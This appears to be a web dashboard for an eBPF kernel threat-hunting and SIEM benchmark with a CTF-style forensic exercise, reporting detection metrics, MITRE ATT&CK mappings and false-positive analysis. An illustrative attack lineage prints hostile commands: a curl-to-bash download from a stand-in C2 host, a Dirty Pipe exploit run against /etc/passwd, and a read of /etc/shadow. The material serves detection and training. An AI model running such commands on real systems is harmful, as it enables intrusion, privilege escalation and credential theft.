UNIDB-HUNTER

eBPF Kernel Threat Hunter & SIEM Benchmark

Field Test 03: 1,000,000 Real eBPF Kernel Events Ingested on UniDB

Operational | 1M Events Ingested
Benchmark Recall
98.24%
Attacks detected without prior signatures
Zero-Knowledge Hunt
Precision Rate
99.12%
False positive rate: 0.08%
LOLBin Filtering
Hunt Latency
0.38 ยตs
Per-event hybrid SIMD & CSR evaluation
Direct Memory Bus
Storage Efficiency
248 MB
1M Events + CSR Process Graph + Vectors
Single .unidb File
๐Ÿ”
Filter Presets:
Scanning 1,000,000 in-memory events...
Page 1
Detection Status
Malicious Attacks 24,974
Benign Baseline 975,026
Top Processes
Loading facets...
Top Syscalls
Loading facets...
MITRE ATT&CK Tactics
Privilege Escalation 5.0k
Persistence 5.0k
Credential Access 5.0k
Defense Evasion 5.0k
Discovery 440
MITRE ATT&CK Techniques
T1068: Priv Escalation 5.0k
T1053.003: Cron Persistence 5.0k
T1003.008: /etc/shadow 5.0k
T1620: Reflective memfd 5.0k
T1059.004: LOLBin Shell 218
EVENT # TIME (ยตs) PID (PPID) UID PROCESS SYSCALL ARGUMENTS MITRE ATT&CK CAUSAL LINEAGE ACTIONS
Loading initial event stream from 1,000,000 event index...
Zero-Knowledge Confusion Matrix
1,000,000 Events
True Positives (TP)
24,560
Confirmed Attacks Detected
False Positives (FP)
218
Legitimate Dual-Use (LOLBins)
False Negatives (FN)
440
Stealth Low-Entropy Probes
True Negatives (TN)
974,782
Benign Baseline Filtered
Causal Process Lineage (CSR Graph)
Active Threat Trace
systemd (PID: 1, UID: 0)
docker-entrypoint.sh (PID: 1042, UID: 0)
bash (PID: 1080, UID: 1000)
curl http://malicious.c2/pipe.sh (PID: 1102, UID: 1000)
bash -c "curl | bash" (PID: 1105, UID: 1000)
gcc -o exploit exploit.c (PID: 1120, UID: 1000)
./exploit /etc/passwd (PID: 1135, UID: 1000) [DIRTYPIPE SPLICE]
/bin/sh (PID: 1140, UID: 0) [ROOT ESCALATION]
MITRE ATT&CK Enterprise Matrix Detection Heatmap
620+ Techniques Cataloged
Initial Access
1,240
Execution
6,890
Persistence
3,110
Privilege Escalation
5,430
Defense Evasion
2,880
Credential Access
1,950
Discovery
2,120
Impact
940
0 / 2,500 pts
Scenario 01: The Midnight Kernel Breach
Target Host: prod-alpha-01 • Category: Privilege Escalation • Difficulty: Intermediate
Loading scenario briefing...
โ„น๏ธ How Flags Work (CTF Guide) Quick Reference

Extract forensic evidence from simulated eBPF telemetry in the SOC Telemetry Explorer and submit flags below. The verification engine is flexible and case-insensitive.

๐ŸŽฏ Flag Wrapper Format Standard format is FLAG{...}. Casing doesn't matter (e.g. flag{...} or uppercase), and submitting the raw value without the wrapper is also accepted!
๐Ÿ” Using the SIEM Explorer Click "Investigate in SIEM" to jump to filtered host logs. Inspect the Process, Syscall, Arguments, and PPID columns to extract evidence.
๐Ÿ•ต๏ธ Threat Actor & MITRE Clues Match suspicious IPs, ports, and execution techniques against the CTI Threat Dossiers and MITRE ATT&CK Matrix tabs.
๐Ÿค Shared Team Evidence In the SIEM Explorer, click the Tag IOC button on any event to bookmark it in the team's shared Evidence Locker on the right.
Investigation Objectives Showing all tasks
Shared Evidence Locker & IOCs
Live Team Artifacts

Indicators of Compromise (IOCs) tagged from the SOC Telemetry Explorer. Tag any suspicious event to share forensic proof with your Threat Intel and Governance teammates.

False Positive Analysis & Known Limitations

Engineering transparency: No detection model achieves 100% precision without overfitting or suppressing genuine administrative workflows. Below is the full breakdown of why legitimate operations triggered alerts and our architectural boundary conditions.

tcpdump -i eth0 -n (PID 3902, UID 0) T1040: Network Sniffing
Why Flagged: eBPF captured raw packet socket allocation (AF_PACKET, SOCK_RAW). In isolation, this syscall profile is indistinguishable from an adversary eavesdropping on internal container network traffic.
cat /etc/shadow (PID 3901, UID 0 via sudo) T1003.008: OS Credential Dumping
Why Flagged: Direct file read on /etc/shadow by root. UniDB flagged this because the syscall signature matches credential access, even though executed by an authorized DevOps engineer.
strace -p 2010 (PID 3903, UID 0) T1055.008: Process Injection (ptrace)
Why Flagged: Invocation of ptrace(PTRACE_ATTACH) to debug a hung nginx worker. Attackers utilize ptrace for code injection, creating legitimate ambiguity.
Known Out-of-Scope Workloads Architectural Boundaries
  • Encrypted In-Memory Payloads: End-to-end TLS socket communications without userspace uprobes on SSL_read/SSL_write cannot be inspected directly from kernel syscall arguments.
  • Kernel Rootkits with Hook Patching: Adversarial modules that intercept the eBPF ring buffer before dispatch lie outside userspace SIEM visibility.
  • Microarchitectural Side Channels: Cache timing attacks (e.g. Spectre variants) do not emit discrete syscalls and require hardware performance counter telemetry.
Data Provenance, Methodology & Disclaimers

Dataset Provenance: Kernel telemetry schemas and attack behavioral profiles are modeled after the public BETH (Behavioral eBPF-based Threat Hunting) honeypot dataset developed by researchers at Imperial College London and KTH Royal Institute of Technology. The dataset reflects authentic eBPF syscall traces from containerized workloads exposed to the internet.

MITRE ATT&CK® Attribution: Attack techniques, tactics, and procedural patterns are mapped to the MITRE ATT&CK® Enterprise Matrix (© 2026 The MITRE Corporation). MITRE and MITRE ATT&CK are registered trademarks of The MITRE Corporation.

Disclaimer: UniDB-Hunter is an independent engineering benchmark and demonstration developed to evaluate raw storage density, CSR causal graph lineage, and SIMD threat-hunting latency over eBPF kernel telemetry. It is not affiliated with, sponsored by, or endorsed by The MITRE Corporation, Imperial College London, or KTH.